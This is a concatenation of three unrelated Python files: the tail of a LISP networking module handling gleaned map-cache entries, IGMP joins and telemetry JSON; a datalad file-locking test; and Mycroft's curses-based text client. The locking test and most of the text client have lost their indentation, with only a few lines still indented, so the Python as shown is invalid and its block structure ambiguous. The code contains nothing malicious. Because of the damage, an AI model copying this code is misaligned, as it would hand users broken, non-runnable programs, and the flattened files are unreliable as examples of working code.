        if (rloc_change):
            e = green(seid.print_address(), False)
            r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
            lprint("Change gleaned EID {} to RLOC {}".format(e, r))
            cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
        #endif
    else:
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        e = green(seid.print_address(), False)
        r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
        mc.add_cache()
    #endif

    #
    # Store the new RLOC and translated port and put it on the probe list.
    #
    if (rloc_change):
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.rloc_set = [rloc_entry]
        mc.build_best_rloc_set()
    #endif

    #
    # Nothing more to do unless an IGMP report came with the packet.
    #
    if (igmp == None): return

    lisp_geid.instance_id = seid.instance_id

    #
    # Process each (*, G) record from the IGMP report, building or removing
    # gleaned multicast state as joins and leaves dictate.
    #
    entries = lisp_process_igmp_packet(igmp)
    if (type(entries) == bool): return

    for source, group, joinleave in entries:
        if (source != None): continue

        lisp_geid.store_address(group)
        allow, rloc_probe, igmp_query = lisp_allow_gleaning(seid, lisp_geid,
            rloc)
        if (allow == False): continue

        if (joinleave):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
        #endif
    #endfor

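#
# Typical glean flow (assumed, for orientation): a data packet from an
# unregistered EID arrives; lisp_glean_map_cache() caches (EID -> RLOC:port),
# and when the packet carried an IGMP report the (*, G) membership is built
# via lisp_build_gleaned_multicast() or torn down via
# lisp_remove_gleaned_multicast().
#
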
def lisp_is_json_telemetry(json_string):
    try:
        json_dict = json.loads(json_string)
        if (type(json_dict) != dict): return(None)
    except:
        lprint("Could not decode telemetry json: {}".format(json_string))
        return(None)
    #endtry

    if ("type" not in json_dict): return(None)
    if ("sub-type" not in json_dict): return(None)
    if (json_dict["type"] != "telemetry"): return(None)
    if (json_dict["sub-type"] != "timestamps"): return(None)
    return(json_dict)

def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
    json_dict = lisp_is_json_telemetry(json_string)
    if (json_dict == None): return(json_string)

    if (json_dict["itr-in"] == "?"): json_dict["itr-in"] = ii
    if (json_dict["itr-out"] == "?"): json_dict["itr-out"] = io
    if (json_dict["etr-in"] == "?"): json_dict["etr-in"] = ei
    if (json_dict["etr-out"] == "?"): json_dict["etr-out"] = eo
    json_string = json.dumps(json_dict)
    return(json_string)

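#
# Example telemetry JSON (assumed shape, matching the keys handled above;
# unfilled timestamps are "?"):
#
#   {"type": "telemetry", "sub-type": "timestamps",
#    "itr-in": "?", "itr-out": "?", "etr-in": "?", "etr-out": "?"}
#
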
def lisp_decode_telemetry(json_string):
    json_dict = lisp_is_json_telemetry(json_string)
    if (json_dict == None): return({})
    return(json_dict)

def lisp_telemetry_configured():
    if ("telemetry" not in lisp_json_list): return(None)

    json_string = lisp_json_list["telemetry"].json_string
    if (lisp_is_json_telemetry(json_string) == None): return(None)

    return(json_string)

def lisp_mr_or_pubsub(action):
    return(action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])

# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 noet:
"""
LICENSE: MIT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os.path as op
from ..locking import lock_if_check_fails
from datalad.tests.utils import ok_exists, with_tempfile, ok_, eq_
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
    # now the check fails, so the lock should actually be acquired
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock.acquired)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
# the same with providing operation
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock.acquired)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
def subproc(q):
with lock_if_check_fails(False, tempfile, blocking=False) as (_, lock2):
q.put(lock2.acquired)
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=subproc, args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile) as (check, lock):
eq_(check, False)
ok_(lock.acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
    ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=subproc, args=(q,))
p.start()
ok_(q.get())
p.join()
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from mycroft.client.text.gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration, BASE_FOLDER
from mycroft.configuration.holmes import is_using_xdg
import locale
# Curses uses LC_ALL to determine how to display chars; set it to the
# system default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
    If the default locale supports UTF-8, reencode the string; otherwise
    remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if not is_using_xdg():
config_file = path
elif os.path.isfile(path):
from mycroft.configuration.config import _log_old_location_deprecation
_log_old_location_deprecation(path)
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths(BASE_FOLDER):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
    except Exception:
        LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if not is_using_xdg():
config_file = path
else:
config_file = os.path.join(xdg.BaseDirectory.xdg_config_home,
BASE_FOLDER, filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
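# Illustrative content of the persisted settings file (keys as written
# above; values are examples only):
#   {"filters": ["mouth.viseme", "mouth.display", "mouth.icon"],
#    "cy_chat_area": 7, "show_last_key": false, "max_log_lines": 5000,
#    "show_meter": true}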
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
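# Illustrative usage of draw(): render a heading padded to the right edge of
# the screen in the heading color.
#   draw(0, 0, "Log Output:", pad=True, clr=CLR_HEADING)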
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
        # Colors (on black background):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
            # Do a full-screen redraw periodically to clear away any noise
            # from non-curses text that gets output to the screen (e.g.
            # modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
